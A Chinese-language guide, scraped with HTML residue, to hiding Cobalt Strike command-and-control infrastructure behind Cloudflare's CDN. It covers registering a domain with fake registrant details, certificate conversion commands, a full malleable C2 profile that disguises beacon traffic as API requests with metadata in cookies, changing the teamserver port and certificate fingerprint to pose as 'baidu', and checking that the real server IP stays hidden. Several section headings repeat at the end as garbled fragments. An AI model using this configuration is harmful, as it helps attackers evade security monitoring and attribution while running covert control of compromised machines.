Cobalt Strike CDN及特征隐匿配置指南<\/h1>

0x00 概述<\/h2>

Cobalt Strike简介<\/h3>

Cobalt Strike（简称CS）是美国Red Team开发的渗透测试工具，具有以下特点：<\/p>

多种协议主机上线方式<\/li>
集成提权、凭据导出、端口转发、socket代理等功能<\/li>
支持Office攻击、文件捆绑、钓鱼等攻击方式<\/li>
可调用Mimikatz等工具<\/li>

支持团队协作<\/li> <\/ul>

隐匿需求的必要性<\/h3>

默认特征易被态势感知设备识别<\/li>
VPS默认端口易被情报网站标记<\/li>
弱密码易被爆破<\/li>

本文采用CDN+特征修改的隐匿方案<\/li> <\/ul>

0x01 域名注册<\/h2>

注册平台<\/h3>
使用www.freenom.com注册免费域名<\/p>

注册要点<\/h3>

准备有效邮箱（国内外均可）<\/li>

填写注册信息时需注意：

IP地址与注册信息一致<\/li>
邮编、手机号可使用虚拟信息<\/li> <\/ul> <\/li>

后续需绑定CDN平台的NS记录<\/li> <\/ol>

参考教程：https:\/\/zhuanlan.zhihu.com\/p\/115535965<\/p>

0x02 CDN平台配置<\/h2>

推荐平台<\/h3>
Cloudflare（https:\/\/dash.cloudflare.com\/）<\/p>

配置步骤<\/h3>

注册Cloudflare账号（可与freenom同邮箱）<\/li>
添加站点（使用注册的域名）<\/li>
在DNS中添加记录<\/li>
修改freenom的NS记录为Cloudflare分配的NS<\/li>

返回Cloudflare验证NS记录<\/li> <\/ol>

0x03 SSL证书创建<\/h2>

在Cloudflare的SSL\/TLS → 概述中，选择"灵活"加密模式<\/li>

在"源服务器"中创建证书：

私钥类型：ECC<\/li>
密钥格式：PEM<\/li> <\/ul> <\/li>

重要<\/strong>：保存源证书和私钥内容<\/li> <\/ol>
0x04 禁用CDN缓存<\/h2>
两种关闭方法（建议都启用）<\/h3>

开发者模式：<\/p>

路径：缓存 → 配置 → 开发者模式 → 开启<\/li> <\/ul> <\/li>

创建页面规则：<\/p>

规则1：*.yourdomain\/*<\/code><\/li>
规则2：yourdomain\/*<\/code><\/li>
设置：缓存级别 → 绕过<\/li> <\/ul> <\/li> <\/ol> 0x05 VPS证书配置<\/h2> 文件准备<\/h3> 在CS文件夹中创建：<\/p> server.pem<\/code> - 粘贴源证书内容<\/li> server.key<\/code> - 粘贴私钥内容<\/li> <\/ol> 证书生成命令<\/h3> openssl pkcs12 -export -in server.pem -inkey server.key -out cfcert.p12 -name cloudflare_cert -passout pass:自定义复杂密码 <\/span><\/span> <\/span><\/span>keytool -importkeystore -deststorepass 密码 -destkeypass 密码 -destkeystore cfcert.store -srckeystore cfcert.p12 -srcstoretype PKCS12 -srcstorepass 密码 -alias cloudflare_cert <\/span><\/span><\/code><\/pre>Profile配置<\/h3> 创建C2.profile<\/code>文件，内容模板：<\/p> https-certificate { set keystore "cfcert.store"; set password "密码"; } http-config { header "Content-Type" "application"; } http-stager { set uri_x86 "\/api\/1"; set uri_x64 "\/api\/2"; client { header "Host" "完整域名"; } server { output{ print; } } } http-get { set uri "\/api\/3"; client { header "Host" "完整域名"; metadata { base64; header "Cookie"; } } server { output{ print; } } } http-post { set uri "\/api\/4"; client { header "Host" "完整域名"; id { uri-append; } output{ print; } } server { output{ print; } } } <\/code><\/pre> Cloudflare支持端口<\/h3> HTTP: 80, 8080, 8880, 2052, 2082, 2086, 2095<\/li> HTTPS: 443, 2053, 2083, 2087, 2096, 8443<\/li> <\/ul> 0x06 Teamserver特征修改<\/h2> 端口修改<\/h3> 编辑teamserver配置文件，修改默认50050端口<\/p> 指纹信息修改<\/h3> 默认指纹：<\/p> CN = Major Cobalt Strike, OU = AdvancedPenTesting, O = cobaltstrike, L = Somewhere, S = Cyberspace, C = Earth <\/code><\/pre> 修改建议：<\/p> CN = baidu, OU = baidu, O = baidu, L = baidu, S = baidu, C = baidu <\/code><\/pre> 或自定义其他信息<\/p> 0x07 启动Teamserver<\/h2> 启动命令<\/h3> .\/teamserver VPS公网IP 密码 C2.profile <\/span><\/span><\/code><\/pre>监听器配置要点<\/h3> 地址填写CDN绑定的域名（非IP）<\/li> 建议使用HTTPS模式<\/li> 避免使用默认443端口，选择其他CDN支持的HTTPS端口<\/li> <\/ol> 0x08 测试验证<\/h2> 在虚拟机中执行生成的payload<\/li> 使用Wireshark抓包验证：过滤VPS真实IP应无结果<\/li> 只应看到与CDN地址的交互<\/li> TCP流中只显示匿名域名，内容加密<\/li> <\/ul> <\/li> <\/ol> 通过以上步骤，即可实现Cobalt Strike的CDN隐匿和特征修改。<\/p>

Cobalt Strike CDN及特征隐匿配置指南<\/h1>

0x00 概述<\/h2>

0x01 域名注册<\/h2>

注册平台<\/h3> 使用www.freenom.com注册免费域名<\/p>

0x02 CDN平台配置<\/h2>

推荐平台<\/h3> Cloudflare（https:\/\/dash.cloudflare.com\/）<\/p>

0x04 禁用CDN缓存<\/h2>

0x05 VPS证书配置<\/h2>

0x06 Teamserver特征修改<\/h2>

端口修改<\/h3> 编辑teamserver配置文件，修改默认50050端口<\/p>

0x07 启动Teamserver<\/h2>

注册平台<\/h3>
使用www.freenom.com注册免费域名<\/p>

推荐平台<\/h3>
Cloudflare（https:\/\/dash.cloudflare.com\/）<\/p>

端口修改<\/h3>
编辑teamserver配置文件，修改默认50050端口<\/p>